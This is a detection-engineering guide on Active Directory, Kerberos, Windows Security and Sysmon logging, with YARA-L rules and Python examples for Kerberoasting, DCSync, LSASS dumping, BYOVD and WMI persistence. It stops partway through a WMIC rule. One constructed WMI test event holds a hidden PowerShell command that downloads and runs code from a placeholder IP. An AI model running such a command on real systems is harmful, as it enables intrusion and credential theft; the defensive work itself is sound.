Author: David Nehoda, Technical Solutions Consultant

# Active Directory, Kerberos, Sysmon, and Windows Security Events
---
## Overview
This section covers on-premises Microsoft infrastructure: Active Directory, Kerberos authentication, Windows Security events, and Sysmon. These are the sources that capture domain compromise, lateral movement, credential theft, and persistence mechanisms.
## Section 1: Active Directory On-Premises

Active Directory is where a domain compromise plays out, and without visibility into Kerberos ticket traffic, directory replication, and group membership changes you will not see it happening. The events below are ordered by attack phase.

### Critical Event IDs
| Event ID | Description | UDM Event Type | Attack Use |
|---|---|---|---|
| 4624 | Successful logon | USER_LOGIN | Baseline auth, anomalous logon types |
| 4625 | Failed logon | USER_LOGIN | Brute force, password spray, credential stuffing |
| 4648 | Logon with explicit credentials | USER_LOGIN | `runas /netonly`, pass-the-hash tooling, lateral movement |
| 4672 | Special privileges assigned to new logon | USER_LOGIN | Admin logon tracking, privilege escalation signal |
| 4720 | User account created | USER_CREATION | Persistence via new accounts |
| 4722 | User account enabled | USER_RESOURCE_UPDATE_CONTENT | Re-enabling disabled accounts |
| 4724 | Password reset attempted by another account | USER_CHANGE_PASSWORD | Forced password reset, lateral movement |
| 4726 | User account deleted | USER_DELETION | Anti-forensics |
| 4728 | Member added to security-enabled global group | GROUP_MODIFICATION | Group-based privilege escalation |
| 4732 | Member added to security-enabled local group | GROUP_MODIFICATION | Local admin escalation |
| 4740 | Account locked out | USER_RESOURCE_UPDATE_CONTENT | Brute force confirmation |
| 4756 | Member added to security-enabled universal group | GROUP_MODIFICATION | Enterprise-wide escalation |
| 4768 | Kerberos TGT requested (AS-REQ) | USER_LOGIN | AS-REP roasting: PreAuthType 0 with RC4 (0x17) |
| 4769 | Kerberos service ticket requested (TGS-REQ) | USER_LOGIN | Kerberoasting (RC4 service tickets); Golden Ticket use (service tickets issued on a TGT the DC never logged in 4768). Silver tickets never reach the DC and do not appear here |
| 4771 | Kerberos pre-authentication failed | USER_LOGIN | Kerberos brute force / password spray (failure code 0x18). Roastable accounts skip pre-auth and do not log 4771 |
| 4776 | NTLM credential validation on the DC | USER_LOGIN | Pass the hash, NTLM relay |
| 4662 | Operation performed on a directory object | GENERIC_EVENT or USER_RESOURCE_ACCESS | DCSync when AccessMask 0x100 pairs with the replication right GUIDs |
| 4697 | Service installed (Security log) | PROCESS_LAUNCH | PsExec, SCShell, service-based lateral movement |
| 4698 | Scheduled task created | SCHEDULED_TASK_CREATION | Persistence, scheduled-task lateral movement |
| 4702 | Scheduled task updated | SCHEDULED_TASK_MODIFICATION | Hijacking existing scheduled tasks |
| 4719 | System audit policy changed | SETTING_MODIFICATION | Anti-forensics, attacker disabling logging |
| 7045 | Service installed (System log) | PROCESS_LAUNCH | Same TTP as 4697, logged in a different channel |
| 1102 | Audit log cleared | SYSTEM_AUDIT_LOG_WIPE | Anti-forensics |
### Field Mapping: Active Directory Events

| Microsoft Field | UDM Field | Notes |
|---|---|---|
| EventData.TargetUserName | target.user.userid | Account being logged into or modified |
| EventData.SubjectUserName | principal.user.userid | Account performing the action |
| EventData.IpAddress | principal.ip | Source IP of the auth request |
| EventData.LogonType | extensions.auth.mechanism + additional.fields[LogonType] | Type 2 Interactive, 3 Network, 4 Batch, 5 Service, 7 Unlock, 8 NetworkCleartext, 9 NewCredentials, 10 RemoteInteractive (RDP), 11 CachedInteractive |
| EventData.TicketEncryptionType | security_result.detection_fields[TicketEncryptionType] | 0x17 RC4-HMAC, 0x11 AES128, 0x12 AES256. RC4 on a TGT in an AES-capable domain is suspicious; RC4 service tickets are still routine for SPN accounts with no AES keys (msDS-SupportedEncryptionTypes unset), so baseline per service account before alerting |
| EventData.TargetDomainName | target.administrative_domain | Cross-domain auth signal |
| EventData.WorkstationName | principal.hostname | Source workstation for network logons |
| EventData.ServiceName | target.application | Kerberoasting target SPN account |
| EventData.PrivilegeList | security_result.detection_fields[PrivilegeList] | Sensitive privileges. SeDebugPrivilege is what LSASS dumpers need, but every administrator logon lists it in 4672, so alert on it for accounts that should not be administrators rather than on its presence alone |
| EventData.AccessMask | security_result.detection_fields[AccessMask] | For 4662, 0x100 (Control Access) together with a replication GUID in Properties signals DCSync |
| EventData.Properties | security_result.detection_fields[Properties] | For 4662, contains the extended-right GUID exercised (replication GUIDs for DCSync) |
### YARA-L Rules: Active Directory

#### Rule 1: Detect Kerberos RC4 Ticket Requests (Kerberoasting, Golden Ticket downgrade)

```yaral
rule Detect_Kerberos_RC4_Ticket_Request {
  meta:
    author = "Detection Engineering"
    description = "Kerberos TGT or service-ticket request returned with RC4-HMAC (0x17). Kerberoasting tools ask for RC4 service tickets because the hash cracks far faster than AES, and a Golden Ticket forged from the krbtgt NT hash also yields RC4 service tickets. SPN accounts without AES keys produce RC4 legitimately, so baseline per service before raising severity."
    severity = "HIGH"
    mitre_attack = "T1558.001, T1558.003"

  events:
    $krb.metadata.log_type = "WINEVTLOG"
    ($krb.metadata.product_event_type = "4769" or $krb.metadata.product_event_type = "4768")
    $krb.security_result.detection_fields["TicketEncryptionType"] = "0x17"
    // Computer accounts request RC4 tickets for legacy hosts; that is not roasting.
    not re.regex($krb.principal.user.userid, `\$$`)
    // Host SPNs (machine accounts) and krbtgt are not crackable Kerberoasting targets.
    not re.regex($krb.target.application, `(?i)^(krbtgt|.*\$)(@.*)?$`)
    $krb.principal.user.userid = $user
    $krb.principal.ip = $src_ip

  match:
    $user over 10m

  outcome:
    $tickets = count($krb)
    $src_ips = array_distinct($src_ip)
    $service_targets = array_distinct($krb.target.application)
    // One user pulling RC4 tickets for many distinct SPNs is the Kerberoasting shape.
    $distinct_services = count_distinct($krb.target.application)

  condition:
    $krb
}
```
#### Rule 2: Detect AS-REP Roasting Campaign

```yaral
rule Detect_ASREP_Roasting_Campaign {
  meta:
    author = "Detection Engineering"
    description = "TGT requests for accounts that do not require pre-authentication (PreAuthType 0), returned with RC4, from one source hitting 5 or more distinct users in 15 minutes. The AS-REP is crackable offline, so the roaster needs no password at all."
    severity = "HIGH"
    mitre_attack = "T1558.004"

  events:
    $tgt.metadata.log_type = "WINEVTLOG"
    $tgt.metadata.product_event_type = "4768"
    $tgt.security_result.detection_fields["TicketEncryptionType"] = "0x17"
    // PreAuthType 0 marks "Do not require Kerberos preauthentication" accounts; confirm the key name your parser emits.
    $tgt.security_result.detection_fields["PreAuthType"] = "0"
    $tgt.principal.user.userid = $target_user
    $tgt.principal.ip = $source_ip

  match:
    $source_ip over 15m

  outcome:
    $targeted_accounts = array_distinct($target_user)
    $distinct_targets = count_distinct($target_user)
    $request_count = count($tgt)

  condition:
    // Threshold on distinct accounts, not raw requests, so a retry loop on one user does not fire it.
    $tgt and $distinct_targets >= 5
}
```
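The threshold logic of Rules 1 and 2, run over constructed 4768/4769 events in Python, as an added example (not the page's code or anything from Google SecOps). The `ev()` helper, the account and SPN names, the IPs and the timestamps are all constructed; the event field names are the real EventData names. The windowing function reproduces what `match ... over` plus `count_distinct` do in YARA-L, and the exclusions mirror the machine-account and host-SPN filters in Rule 1.

```python
"""Kerberoasting and AS-REP roasting logic over constructed 4768/4769 events.

Added example, not the page's or Google SecOps' code. Dictionaries mimic the
EventData fields of Windows Security 4768 (AS-REQ) and 4769 (TGS-REQ); every
value below is constructed for the illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # TicketEncryptionType: RC4-HMAC 0x17, AES128 0x11, AES256 0x12


def ev(event_id, user, ts, etype="0x12", ip="10.0.1.10", svc="", preauth="2"):
    """Build a constructed 4768/4769 event using the EventData field names."""
    return {"EventID": event_id, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "PreAuthType": preauth,
            "IpAddress": ip, "Status": "0x0", "ts": ts}


# Constructed sample: routine AES traffic, one Kerberoasting burst by bob, one
# legacy RC4 service ticket for carol, a machine-account requester, and an
# AS-REP roasting sweep of five pre-auth-disabled users from 10.0.9.9.
SAMPLE_EVENTS = [
    ev(4769, "alice", "2024-05-01T09:00:00", svc="WS01$"),
    ev(4768, "alice", "2024-05-01T09:00:01"),
    ev(4769, "bob", "2024-05-01T09:01:00", etype="0x17", ip="10.0.1.55", svc="svc_sql"),
    ev(4769, "bob", "2024-05-01T09:01:05", etype="0x17", ip="10.0.1.55", svc="svc_http"),
    ev(4769, "bob", "2024-05-01T09:01:09", etype="0x17", ip="10.0.1.55", svc="svc_backup"),
    ev(4769, "bob", "2024-05-01T09:01:12", etype="0x17", ip="10.0.1.55", svc="svc_sql"),
    ev(4769, "carol", "2024-05-01T09:05:00", etype="0x17", svc="svc_legacy"),
    ev(4769, "FS01$", "2024-05-01T09:06:00", etype="0x17", svc="svc_sql"),
] + [
    ev(4768, f"user{i}", f"2024-05-01T09:1{i}:00", etype="0x17", ip="10.0.9.9", preauth="0")
    for i in range(5)
]


def is_rc4(event):
    return int(event["TicketEncryptionType"], 16) == RC4_HMAC


def max_distinct_in_window(events, key_field, value_field, window):
    """Per key, the largest count of distinct values inside any span of length
    `window` (what YARA-L's match window plus count_distinct computes)."""
    by_key = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_key[e[key_field]].append(e)
    result = {}
    for key, evs in by_key.items():
        best = 0
        for i, first in enumerate(evs):
            start = datetime.fromisoformat(first["ts"])
            in_span = [x for x in evs[i:] if datetime.fromisoformat(x["ts"]) - start <= window]
            best = max(best, len({x[value_field] for x in in_span}))
        result[key] = best
    return result


def kerberoast_candidates(events, window=timedelta(minutes=10), min_spns=3):
    """Users who obtained RC4 service tickets for >= min_spns distinct SPN accounts.
    Machine-account requesters, host SPNs and krbtgt are excluded: they produce RC4
    legitimately and are not crackable targets."""
    tgs = [e for e in events
           if e["EventID"] == 4769 and is_rc4(e) and e["Status"] == "0x0"
           and not e["TargetUserName"].split("@")[0].endswith("$")
           and not e["ServiceName"].split("/")[0].endswith("$")
           and e["ServiceName"].lower() != "krbtgt"]
    counts = max_distinct_in_window(tgs, "TargetUserName", "ServiceName", window)
    return sorted(user for user, n in counts.items() if n >= min_spns)


def asrep_roast_sources(events, window=timedelta(minutes=15), min_accounts=5):
    """Source IPs that obtained RC4 AS-REPs for >= min_accounts distinct users
    whose pre-authentication is disabled (PreAuthType 0)."""
    asreq = [e for e in events
             if e["EventID"] == 4768 and is_rc4(e) and e["PreAuthType"] == "0"]
    counts = max_distinct_in_window(asreq, "IpAddress", "TargetUserName", window)
    return sorted(ip for ip, n in counts.items() if n >= min_accounts)


if __name__ == "__main__":
    print("Kerberoasting:", kerberoast_candidates(SAMPLE_EVENTS))    # ['bob']
    print("AS-REP roasting:", asrep_roast_sources(SAMPLE_EVENTS))   # ['10.0.9.9']
```

Carol's single RC4 ticket for a legacy SPN stays below the threshold, which is the point: the distinct-SPN count, not RC4 by itself, separates a roasting sweep from a service account that simply lacks AES keys.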
#### Rule 3: Detect DCSync Credential Replication

```yaral
rule Detect_DCSync_Replication_Access {
  meta:
    author = "Detection Engineering"
    description = "Event 4662 in which a replication extended right (DS-Replication-Get-Changes, -All, or -In-Filtered-Set) is exercised by an account that is not a domain controller or an expected replication service account. Get-Changes-All is the right that returns secrets; seeing it from a user account is the DCSync signature."
    severity = "CRITICAL"
    mitre_attack = "T1003.006"

  events:
    $ds.metadata.log_type = "WINEVTLOG"
    $ds.metadata.product_event_type = "4662"
    // 0x100 = Control Access, the mask logged when an extended right is exercised.
    $ds.security_result.detection_fields["AccessMask"] = "0x100"
    ($ds.security_result.detection_fields["Properties"] = /1131f6aa-9c07-11d1-f79f-00c04fc2dcd2/ nocase or
     $ds.security_result.detection_fields["Properties"] = /1131f6ad-9c07-11d1-f79f-00c04fc2dcd2/ nocase or
     $ds.security_result.detection_fields["Properties"] = /89e95b76-444d-4c62-991a-0facbeda640c/ nocase)
    // Machine accounts (DC-to-DC replication) and the AD Connect sync accounts hold these rights by design.
    not ($ds.principal.user.userid = /\$$/ or
         $ds.principal.user.userid = /^MSOL_/ nocase or
         $ds.principal.user.userid = /^AAD_/ nocase)
    $ds.principal.user.userid = $user
    $ds.principal.hostname = $dc

  match:
    $dc over 5m

  outcome:
    $accounts = array_distinct($user)
    $rights = array_distinct($ds.security_result.detection_fields["Properties"])

  condition:
    $ds
}
```

The `not` clause excludes machine accounts (ending in `$`) and the Azure AD Connect sync accounts (`MSOL_`, `AAD_`). Treat anything else exercising replication rights as DCSync until proven otherwise, but do not treat the exclusions as safe by default: the AD Connect account is itself a DCSync-capable credential that attackers go after, so pin it to its actual SamAccountName in a reference list rather than a prefix, and expect to add any backup or identity-governance product that legitimately replicates. DS-Replication-Get-Changes-All is the right that returns password hashes; Get-Changes alone does not. 4662 only fires if the domain object's SACL audits these extended rights and the Directory Service Access audit subcategory is enabled on the DCs, so verify both before relying on this rule.
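The 4662 triage in Rule 3, run over constructed events in Python, as an added example (not the page's code). It gates on the Control Access bit before looking at the GUIDs, reports which of the three rights was exercised, and flags whether Get-Changes-All (the secrets-returning right) was among them. The three replication GUIDs are the real AD extended-right values; the account names, DC name, and the non-replication GUID are constructed, and the prefix-based allowlist is a simplification of the rule's regex exclusions.

```python
"""DCSync triage over constructed 4662 events (added example, not the page's code).

The three replication GUIDs are the AD extended rights DCSync exercises; the
sample events, account names and the unrelated-right GUID are constructed.
"""
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPL_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPL_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    DS_REPL_GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # 4662 AccessMask bit set when an extended right is exercised
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample 4662 events. Properties lists the right GUID first, then
# the object-class GUID, in the "{guid}\n\t{guid}" layout the event uses.
SAMPLE_4662 = [
    # DC-to-DC replication by a machine account: expected.
    {"SubjectUserName": "DC02$", "Computer": "DC01.corp.local", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # AD Connect sync account on the allowlist: expected.
    {"SubjectUserName": "MSOL_1a2b3c4d5e6f", "Computer": "DC01.corp.local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Some other extended right (GUID constructed): must not alert.
    {"SubjectUserName": "helpdesk1", "Computer": "DC01.corp.local", "AccessMask": "0x100",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
    # Replication GUID present but the mask is Read Property (0x10), not Control Access.
    {"SubjectUserName": "auditor", "Computer": "DC01.corp.local", "AccessMask": "0x10",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # DCSync: a user account exercising Get-Changes and Get-Changes-All.
    {"SubjectUserName": "CORP\\jsmith", "Computer": "DC01.corp.local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
]


def replication_rights_used(event):
    """Replication-right GUIDs named in Properties, but only when the mask says
    the access was Control Access; a property read listing a GUID is not DCSync."""
    if not int(event["AccessMask"], 16) & CONTROL_ACCESS:
        return set()
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return guids & set(REPLICATION_RIGHTS)


def is_expected_replicator(subject, allowlist):
    """Machine accounts (DCs replicating) and allow-listed sync-account prefixes."""
    name = subject.split("\\")[-1]
    return name.endswith("$") or any(name.lower().startswith(p.lower()) for p in allowlist)


def dcsync_alerts(events, allowlist=("MSOL_", "AAD_")):
    alerts = []
    for e in events:
        rights = replication_rights_used(e)
        if not rights or is_expected_replicator(e["SubjectUserName"], allowlist):
            continue
        alerts.append({
            "account": e["SubjectUserName"],
            "dc": e["Computer"],
            "rights": sorted(REPLICATION_RIGHTS[g] for g in rights),
            # Only Get-Changes-All returns secrets; Get-Changes alone cannot.
            "secrets_exposed": DS_REPL_GET_CHANGES_ALL in rights,
        })
    return alerts


if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_4662):
        print(a)   # one alert: CORP\jsmith, both rights, secrets_exposed True
```

The prefix allowlist is deliberately the weak part: an attacker who can create accounts can name one `MSOL_anything`, so in production replace the prefixes with the exact SamAccountNames of your sync accounts.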
## Section 2: Windows Security Events and Sysmon

The native Security log and Sysmon together produce the richest endpoint telemetry. Sysmon is free, and it records what 4688 cannot: file hashes, parent and child command lines in one record, DLL and driver loads, per-process network connections, named pipes, and WMI subscription activity, which is where Living-off-the-Land techniques show up. (4688 does carry the command line once "Include command line in process creation events" is enabled, so turn that on regardless.)

### Critical Sysmon Event IDs
| Event ID | Description | UDM Event Type | Primary Detection Use |
|---|---|---|---|
| 1 | Process creation | PROCESS_LAUNCH | Full command-line capture, parent-child chains |
| 2 | File creation time changed | FILE_MODIFICATION | Timestomping, anti-forensics |
| 3 | Network connection | NETWORK_CONNECTION | Process-to-IP, C2 beacon identification |
| 6 | Driver loaded | PROCESS_MODULE_LOAD | BYOVD (Bring Your Own Vulnerable Driver), rootkit install |
| 7 | Image loaded (DLL) | PROCESS_MODULE_LOAD | DLL side-loading, reflective injection |
| 8 | CreateRemoteThread | PROCESS_OPEN (sometimes PROCESS_INJECTION) | Process injection, Cobalt Strike |
| 10 | Process access | PROCESS_OPEN | LSASS memory access, credential dumping |
| 11 | File create | FILE_CREATION | Payload drops, staging directories |
| 12 | Registry key create or delete | REGISTRY_CREATION / REGISTRY_DELETION | Persistence keys |
| 13 | Registry value set | REGISTRY_MODIFICATION | Run keys, service configuration |
| 15 | FileCreateStreamHash | FILE_CREATION | Alternate Data Stream abuse |
| 17 | Pipe created | PROCESS_LAUNCH | Named pipe lateral movement |
| 18 | Pipe connected | PROCESS_LAUNCH | SMB beacon, Cobalt Strike pipe pivot |
| 19 | WMI EventFilter activity | SETTING_MODIFICATION | WMI persistence (permanent event subscription) |
| 20 | WMI EventConsumer activity | SETTING_MODIFICATION | WMI persistence |
| 21 | WMI EventConsumerToFilter | SETTING_MODIFICATION | WMI persistence (the binding that completes the triad) |
| 22 | DNS query | NETWORK_DNS | DNS C2, DGA detection |
| 23 | File delete (archived) | FILE_DELETION | Anti-forensic delete with content preserved |
| 24 | Clipboard contents | GENERIC_EVENT | Credential theft via clipboard, data staging |
| 25 | Process tampering | PROCESS_LAUNCH | Process hollowing, process herpaderping |
| 26 | File delete detected | FILE_DELETION | Lighter than 23, no content archive |
### Field Mapping: Sysmon Events

| Microsoft Field | UDM Field | Notes |
|---|---|---|
| EventData.CommandLine | target.process.command_line | The command with all arguments |
| EventData.ParentImage | principal.process.file.full_path | Parent binary path |
| EventData.ParentCommandLine | principal.process.command_line | Parent command line (critical for chain analysis) |
| EventData.Image | target.process.file.full_path | Child binary path |
| EventData.Hashes | target.process.file.md5, target.process.file.sha1, target.process.file.sha256 | Chronicle parser splits the multi-hash string into individual fields |
| EventData.User | target.user.userid | Account context |
| EventData.DestinationIp | target.ip | For Sysmon 3 |
| EventData.DestinationPort | target.port | For Sysmon 3 |
| EventData.QueryName | network.dns.questions.name | For Sysmon 22 |
| EventData.ImageLoaded | src.process.file.full_path or target.process.file.full_path | For Sysmon 6 and 7 (varies by parser) |
| EventData.Signed, EventData.SignatureStatus | target.file.is_signed, security_result.detection_fields[SignatureStatus] | Critical for BYOVD detection |
| EventData.TargetObject (registry) | target.registry.registry_key | Full registry path |
| EventData.Details (registry) | target.registry.registry_value_data | Value that was set |
| EventData.Destination (WMI) | target.process.command_line | WMI consumer command |
### YARA-L Rules: Sysmon & Windows Security

#### Rule 4: LSASS Credential Dumping (Production Grade)

Far stricter than a bare "anything that opens LSASS" rule: it uses a reference list for legitimate accessors and requires an access mask that includes memory read. Correlating the open to a file write in Temp or AppData within 60 seconds (the dump file landing) is a worthwhile extension, but it is not part of the rule below.
```yaral
rule Detect_LSASS_Credential_Dump {
  meta:
    author = "Detection Engineering"
    description = "Process opens LSASS with an access mask that includes PROCESS_VM_READ (bit 0x10), from an image not on the trusted accessor list. The listed masks cover Mimikatz-style reads (0x1010, 0x1410), read-plus-write variants (0x1438, 0x143a) and PROCESS_ALL_ACCESS (0x1fffff), which ProcDump requests."
    severity = "CRITICAL"
    mitre_attack = "T1003.001"

  events:
    $open.metadata.log_type = "WINEVTLOG"
    $open.metadata.event_type = "PROCESS_OPEN"
    re.regex($open.target.process.file.full_path, `(?i)\\lsass\.exe$`)
    // Sysmon 10 GrantedAccess is a hex string such as "0x1010"; anchor so 0x1010 does not also match 0x10100.
    re.regex($open.security_result.detection_fields["GrantedAccess"], `(?i)^0x(1010|1410|1438|143a|1fffff)$`)
    // Reference-list membership is an exact string match on the full path.
    not $open.principal.process.file.full_path in %trusted_lsass_accessors
    $open.principal.hostname = $host
    $open.principal.process.file.full_path = $accessor

  match:
    $host over 5m

  outcome:
    $accessing_processes = array_distinct($accessor)
    $access_masks = array_distinct($open.security_result.detection_fields["GrantedAccess"])
    $commands = array_distinct($open.principal.process.command_line)

  condition:
    $open
}
```
Trusted LSASS accessors reference list:

- C:\Windows\System32\csrss.exe
- C:\Windows\System32\wininit.exe
- C:\Windows\System32\services.exe
- C:\Windows\System32\svchost.exe
- C:\Windows\System32\lsm.exe (Windows 7 / Server 2008 R2 only; later versions host LSM inside svchost)
- C:\Windows\System32\MRT.exe
- C:\Program Files\Windows Defender\MsMpEng.exe
- Your EDR paths (CrowdStrike, SentinelOne, Defender, Carbon Black, Tanium)
- Any backup agent that reads LSASS

Two cautions on the list. `in %list` is an exact string comparison, so entries must use the path casing your parser emits. And svchost.exe is a broad entry: attackers inject into it precisely because it is trusted everywhere, so consider requiring services.exe as its parent before treating an svchost LSASS read as benign.
#### Rule 5: Bring Your Own Vulnerable Driver (BYOVD)

```yaral
rule Detect_BYOVD_Driver_Load {
  meta:
    author = "Detection Engineering"
    description = "Kernel driver (Sysmon 6) loaded from a user-writable path, or unsigned or carrying a non-valid signature. BYOVD has been used by LockBit, BlackByte and Scattered Spider to disable EDR. Most abused drivers are validly signed, so this rule catches the careless cases and the hash reference list does the rest."
    severity = "CRITICAL"
    mitre_attack = "T1068, T1211"

  events:
    $drv.metadata.log_type = "WINEVTLOG"
    $drv.metadata.event_type = "PROCESS_MODULE_LOAD"
    // Sysmon 7 (DLL loads) shares this UDM type; pin the rule to the driver-load event.
    $drv.metadata.product_event_type = "6"
    re.regex($drv.target.process.file.full_path, `(?i)\.sys$`)
    // Signature field names follow the Sysmon mapping above; confirm them against your parser.
    (re.regex($drv.target.process.file.full_path, `(?i)\\(Temp|AppData|ProgramData|Users\\Public|PerfLogs)\\`) or
     $drv.security_result.detection_fields["SignatureStatus"] != "Valid" or
     $drv.target.file.is_signed = false)
    $drv.principal.hostname = $host

  match:
    $host over 10m

  outcome:
    $drivers = array_distinct($drv.target.process.file.full_path)
    $hashes = array_distinct($drv.target.process.file.sha256)

  condition:
    $drv
}
```

The drivers used for BYOVD are usually legitimately signed (that is what lets them load), so the path and signature checks above only catch the sloppy cases. Feed `$hashes` into a reference list seeded from the LOLDrivers project (known-vulnerable driver hashes) and alert on any match regardless of path or signature status; that list, not the signature check, is the primary control.
#### Rule 6: WMI Event Consumer Persistence

```yaral
rule Detect_WMI_Persistence_Consumer_Binding {
  meta:
    author = "Detection Engineering"
    description = "Permanent WMI event subscription: a filter (Sysmon 19) and a consumer (Sysmon 20) are created on a host and then bound together (Sysmon 21). The triad is the fileless persistence primitive; the binding is the step that makes it live."
    severity = "HIGH"
    mitre_attack = "T1546.003"

  events:
    $filter.metadata.log_type = "WINEVTLOG"
    $filter.metadata.product_event_type = "19"
    $filter.principal.hostname = $host

    $consumer.metadata.log_type = "WINEVTLOG"
    $consumer.metadata.product_event_type = "20"
    $consumer.principal.hostname = $host

    $binding.metadata.log_type = "WINEVTLOG"
    $binding.metadata.product_event_type = "21"
    $binding.principal.hostname = $host

    // The binding must come last; filter and consumer may arrive in either order.
    $binding.metadata.event_timestamp.seconds >= $filter.metadata.event_timestamp.seconds
    $binding.metadata.event_timestamp.seconds >= $consumer.metadata.event_timestamp.seconds

  match:
    $host over 30m

  outcome:
    $consumer_cmd = array_distinct($consumer.target.process.command_line)

  condition:
    $filter and $consumer and $binding
}
```

Two refinements if your parser exposes the fields: Sysmon records an `Operation` (Created / Deleted) on all three events, so restrict each to Created or a cleanup will look like a fresh subscription, and Sysmon 21 names the filter and consumer it binds (`__EventFilter.Name="..."`, `CommandLineEventConsumer.Name="..."`), which lets you join on the object names rather than on the host alone.
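The triad correlation in Rule 6, run over constructed Sysmon 19/20/21 records in Python, as an added example (not the page's or Sysmon's code). It joins the binding to its filter and consumer by the object names Sysmon 21 reports, ignores Deleted operations, and enforces the binding-last ordering inside the window. The field names (`Name`, `Query`, `Type`, `Destination`, `Consumer`, `Filter`, `Operation`, `UtcTime`) are Sysmon's; the hosts, object names, WQL query and consumer command line are constructed.

```python
"""Correlate Sysmon 19/20/21 into a WMI permanent-subscription triad.

Added example, not the page's code. Field names follow Sysmon's WMI events;
the hosts, object names, query and command line are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

NAME_RE = re.compile(r'Name="([^"]+)"')   # Sysmon 21 references look like __EventFilter.Name="X"

# Constructed sample: a malicious triad on WS07, the stock SCM event-log
# subscription on SRV02 re-bound hours after its parts were created (outside the
# window), and a later deletion of the WS07 binding that must be ignored.
SAMPLE_WMI = [
    {"EventID": 19, "Computer": "WS07", "UtcTime": "2024-05-01T10:00:00", "Operation": "Created",
     "User": "CORP\\bob", "Name": "UpdFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Computer": "WS07", "UtcTime": "2024-05-01T10:00:05", "Operation": "Created",
     "User": "CORP\\bob", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.9.9/a')\""},
    {"EventID": 21, "Computer": "WS07", "UtcTime": "2024-05-01T10:00:10", "Operation": "Created",
     "User": "CORP\\bob", "Consumer": 'CommandLineEventConsumer.Name="Updater"', "Filter": '__EventFilter.Name="UpdFilter"'},
    {"EventID": 19, "Computer": "SRV02", "UtcTime": "2024-05-01T06:00:00", "Operation": "Created",
     "User": "NT AUTHORITY\\SYSTEM", "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Computer": "SRV02", "UtcTime": "2024-05-01T06:00:01", "Operation": "Created",
     "User": "NT AUTHORITY\\SYSTEM", "Name": "SCM Event Log Consumer", "Type": "NTEventLog", "Destination": ""},
    {"EventID": 21, "Computer": "SRV02", "UtcTime": "2024-05-01T10:30:00", "Operation": "Created",
     "User": "NT AUTHORITY\\SYSTEM", "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 21, "Computer": "WS07", "UtcTime": "2024-05-01T11:00:00", "Operation": "Deleted",
     "User": "CORP\\bob", "Consumer": 'CommandLineEventConsumer.Name="Updater"', "Filter": '__EventFilter.Name="UpdFilter"'},
]


def _ts(event):
    return datetime.fromisoformat(event["UtcTime"])


def wmi_subscription_triads(events, window=timedelta(minutes=30)):
    """One record per binding (21) whose named filter (19) and consumer (20) were
    created on the same host within `window` before the binding."""
    by_host = defaultdict(lambda: {19: {}, 20: {}, 21: []})
    for e in events:
        if e.get("Operation") != "Created":
            continue                                  # deletions are cleanup, not setup
        bucket = by_host[e["Computer"]]
        if e["EventID"] in (19, 20):
            bucket[e["EventID"]][e["Name"]] = e       # latest creation of that name wins
        elif e["EventID"] == 21:
            bucket[21].append(e)

    hits = []
    for host, bucket in by_host.items():
        for binding in bucket[21]:
            filt_name = NAME_RE.search(binding["Filter"])
            cons_name = NAME_RE.search(binding["Consumer"])
            if not (filt_name and cons_name):
                continue
            filt = bucket[19].get(filt_name.group(1))
            cons = bucket[20].get(cons_name.group(1))
            if not (filt and cons):
                continue                              # parts created before retention, or never seen
            bt = _ts(binding)
            if not all(timedelta(0) <= bt - _ts(x) <= window for x in (filt, cons)):
                continue                              # binding must follow both, inside the window
            hits.append({"host": host, "user": binding["User"], "filter": filt["Query"],
                         "consumer_type": cons["Type"], "consumer": cons["Destination"]})
    return hits


if __name__ == "__main__":
    for h in wmi_subscription_triads(SAMPLE_WMI):
        print(h["host"], h["user"], h["consumer"])   # WS07 CORP\bob powershell.exe ...
```

Joining on the object names is what lets the SRV02 case fall out cleanly: the binding references real filter and consumer objects, but they were created hours earlier, so it is a re-bind of an existing subscription rather than new persistence being installed.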
#### Rule 7: WMIC to PowerShell Execution Chain

Tightened with an admin-workstation exclusion so your IT helpdesk does not page the SOC. Note that wmic.exe is deprecated and no longer installed by default on recent Windows 11 builds, so on a current fleet any appearance of it is itself worth a look.

```yaral
rule Detect_WMIC_Spawning_PowerShell_Or_Cmd {
  meta:
    author = "Detection Engineering"
    description = "wmic.exe spawning powershell, cmd or rundll32 with suspicious arguments, or wmic invoked with 'process call create' or a remote /node: target. LotL execution chain common to Cobalt Strike, Lumma, Qakbot."
    severity = "HIGH"
    mitre_attack = "T1047"
